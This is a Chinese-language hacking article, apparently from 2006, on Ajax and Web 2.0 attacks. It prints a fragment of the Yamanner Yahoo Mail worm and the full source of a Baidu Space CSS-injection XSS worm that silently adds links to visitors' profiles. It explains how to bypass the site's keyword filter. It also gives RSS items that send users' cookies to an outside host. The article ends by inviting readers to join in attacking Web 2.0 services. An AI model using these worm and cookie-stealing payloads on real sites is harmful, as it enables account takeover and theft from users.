WEB2.0攻击新潮—Ajax Hacking
作者:梦之光芒(Monyer)
05年初,随着web2.0这个字眼在中国的各大网络媒体上如潮水般的涌现,Ajax技术(AJAX,即"Asynchronous JavaScript And XML"的缩写,可翻译为异步JavaScript及XML技术。其核心是一个寄宿在浏览器中名为XMLHTTPRequest的类)也立即成为了大家学习研究及讨论的焦点。当然凡事有利亦有弊,黑客们很快就找到了Ajax的可攻击弱点——SQL资料隐码(SQL injections)、跨站脚本(cross-site scripting)和服务拒绝攻击(Denial of Service)等。只是当时web2.0技术尚没有像如今一样流行,而且没有比较正规化的平台发展起来,所以并没有大量的攻击出现。
真正的大型Ajax攻击在今年的6月12日首次出现在Yahoo!的Email服务上,而且甚至引起symantec的高度警觉。在其官方网站上你可以看到如下信息(图1):
Discovered: June 12, 2006
Updated: June 20, 2006 10:46:40 AM ZW3
Also Known As: JS/Yamanner@MM [McAfee], JS_YAMANER.A [Trend Micro], Yamanner.A [F-Secure], JS/Yamann-A [Sophos]
Type: Worm
Infection Length: 6,377 bytes.
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP
JS.Yamanner@m is a worm that is written in JavaScript. It exploits a vulnerability in the Yahoo! Mail service to send a copy of itself to other Yahoo! Mail contacts.
你可以看到该攻击程序为一大小为6.377k的javascript蠕虫程序,并在20日进行了变种;因为是javascript代码,所以可以通吃所有版本的windows操作系统。Symantec对其的官方解释为:Yamanner是一个用javascript写的蠕虫,它利用Yahoo! Mail服务的一个弱点以用户的联系人列表向外发出自己的拷贝。事实上这个蠕虫甚至不需要你打开附件,只要一浏览邮件立即会使其蔓延。我很幸运地对于当时原始的病毒代码进行收集,有兴趣的可以到光盘中查看,如今在网上几乎找不到了。从其中的一段功能代码,你可以看出javascript究竟是怎么被写入的,写入后文件又是通过什么方式调用的:
<img src='http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif'
target=""onload="var http_request = false; var Email = ''; var //- - javascript以onload形式被写入调用图片的代码中
IDList = ''; var CRumb = ''; function makeRequest(url, Func, Method,
Param) { //- - 执行标准的Ajax语句:XMLHttpRequest,并对浏览器是否IE进行判断 if (window.XMLHttpRequest) { http_request =
new XMLHttpRequest(); } else if (window.ActiveXObject) {
http_request = new ActiveXObject('Microsoft.XMLHTTP'); }
http_request.target=""onreadystatechange = Func;
http_request.open(Method, url, true); if( Method == 'GET')
http_request.send(null); else http_request.send(Param);
}window.open('http://www,lastdata.com'); ServerUrl = url0;USIndex =
ServerUrl.indexOf('us.' ,0);MailIndex = ServerUrl.indexOf('.mail' ,0);CutLen =
MailIndex - USIndex - 3;var Server = ServerUrl.substr(USIndex + 3, CutLen);
function GetIDs(HtmlContent) { IDList = ''; StartString = '
<td>'; EndString = '</td>';
由此Ajax攻击可见一斑,然而这还仅仅是个开始。7月份百度开通了百度空间,虽然没有指明是应用web2.0技术,但从web2.0象征的测试版(beta)和页面模版架构等等,你可以看出它事实上已经应用了Ajax技术。而在空间开通不到半个月,相应的攻击方式又产生了,这个攻击应该又算是一个蠕虫吧。它利用百度提交的自定义css(Cascading Stylesheet,层叠样式表单)中对插入的javascript过滤不严格,而使攻击者可以写入恶意代码进行了xss(Cross Site Scripting)跨站。从而使浏览该空间的百度通行证用户在不知觉的情况下将该站点加入自己的友情连接中。最原始代码标本如下:
#header{height:89px;background:url("javascript:document.body.onload = function(){ //- - 在css的样式标签中插入javascript代码
var req = null;
if(window.XMLHttpRequest) req = new XMLHttpRequest(); //- - 这句懂ajax的都知道,是它的核心XMLHttpRequest,而下面当然是必不可少的判断是否IE的语句了。
else if(window.ActiveXObject){
var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for(var i=0;i<msxml.length;i++){try{req = new ActiveXObject(msxml[i]); break;}catch(e){}}
try{req.overrideMimeType('text/xml')}catch(e){}
}
req.open('get','.',false);
req.send();
var s=req.responseText;
p=s.indexOf('passport.baidu.com/?logout');
if(p>0)
{
p=s.indexOf('<strong>');
if(p>0)
{
p=s.indexOf('/',p);
p2=s.indexOf(String.fromCharCode(34),p);
var user=s.substring(p+1,p2);
var name='Here is a bad site';
var link='目标网址';
var desc='This link was added by an XSS script';
var url='/'+user+'/commit';
var data='ct=6&cm=1&spRef='+escape('http://hi.baidu.com/'+user)+'%2Fmodify%2Fbuddylink%2F0&spBuddyName='+escape(name)+'&spBuddyURL='+escape(link)+'&spBuddyIntro='+escape(desc); //- - 这句是整个蠕虫的执行语句,也是Ajax的数据异步调用语句。
req.open('post',url,false);
req.send(data);
alert('A friend link has been added to your space at http://hi.baidu.com/' +user);
}
}
else{alert('You are not a logged Baidu user.');} //- - 由于是标本语句,所以这里有对是否登陆的判断,但实际攻击中当然不会有。
}");
}
当时百度在第一时间内对此蠕虫作出了反映——过滤提交表单中的javascript,当然这也使正常用户无法再在blog中贴入Flash动画。但后来的变种使得境况变得更糟糕,因为有人发现百度仅仅是过滤了CSS文本中的譬如"javascript"和"expression"这样的字符串。也就是说如果把”javascript”分成两行来写,就可以绕过百度的过滤但同时又被IE执行。而这时变种的蠕虫也随之产生,其造成的结果是在用户的css中加入如下代码:
#header {</textarea><script>window.location.href='http://hi.baidu.com';</script>……
很简单的一句吧,这几乎把该蠕虫提升到了病毒性质,因为用户本身无法到达css修改页面来修复他的css代码。事实上直到写这篇文章时,百度空间尚没有对一些另类的插入恶意代码方式进行有效地过滤和封锁。(图2 )
如果认为他们所造成的影响都是局域的,那么我不得不带领大家来看一些影响比较广泛的最具有web2.0性质的——Rss(Really Simple Syndication)攻击。这是我从zdnet.com的Joris Evers的一篇名为“Blog feeds may carry security risk ”了解到的,大体意思是说由于目前几乎所有的不管是在线的还是离线的Rss阅读器都没有有效地对搀杂在Rss中的脚本进行过滤,导致攻击者可以向Rss中写入恶意的javascript代码,最终导致xss跨站,获取用户信息或其他。包括著名的Bloglines, RSS Reader, RSS Owl, Feed Demon, Sharp Reader都在攻击范围之内。这是去年yahoo rss xss代码:(图3)
<item>
<title>Steal My Cookie!</title>
<link>javascript:%20document.location='http://www.target.com/cookie.cgi?'%20+document.cookie;</link> <!—获取用户在当前站点的cookies,并发送到http://www.target.com/cookie.cgi 进行记录-->
<description>Should Steal Your Cookie.</description>
<pubDate>Tue, 20 Sep 2005 23:55:18 EDT</pubDate>
</item>
<item>
<title>Show My Cookie!</title>
<link>javascript:%20alert(document.cookie);</link><!—弹出用户cookies-->
<description>Should Steal Your Cookie.</description>
<pubDate>Tue, 20 Sep 2005 23:55:18 EDT</pubDate>
</item>
事实上,最早的web2.0攻击出现在去年的myspace.上,有人在MySpace交友网站上写了一段JavaScript蠕虫代码,利用Ajax方法让无数的用户在不知情的情况下把他加入了好友名单,同时在他们的个人简介最后自动加上了“samy is my hero”的字样。此蠕虫被称为世界上第一个“web2.0蠕虫”。而从上文的对email、css、rss攻击进行的描述中你也可以看出目前对 web2.0的攻击利用亦是多方面的。但并不单单指跨站,网上有一篇《Hacking Ajax》的文章,其中有一句话被加了黑体,“By corrupting one of the dozens of data exchanges Ajax handles while loading a Web page, a hacker can take over control of the PC”,也就是说适当情况下,利用Ajax攻击并获得个人电脑管理权限亦是可能的。
由于目前系统对补丁的发布采取的都是时时更新功能,想通过溢出获得shell已经很难了,除非是0day的系统漏洞;而sql注入在网络也肆虐了几年,亦有了行之有效的防范方法;并且由于Python和Ruby语言的兴起,新的web2.0服务正在产生并有取代现有web结构趋势,譬如Plone。但不可改变的是web浏览器对xhtml和javascript的解释,只要我们始终有改变javascript的可能性,我们就永远有提升自己权限的可能……
那么对于日趋庞大的web2.0大军,你是否有兴趣从中分一杯羹呢?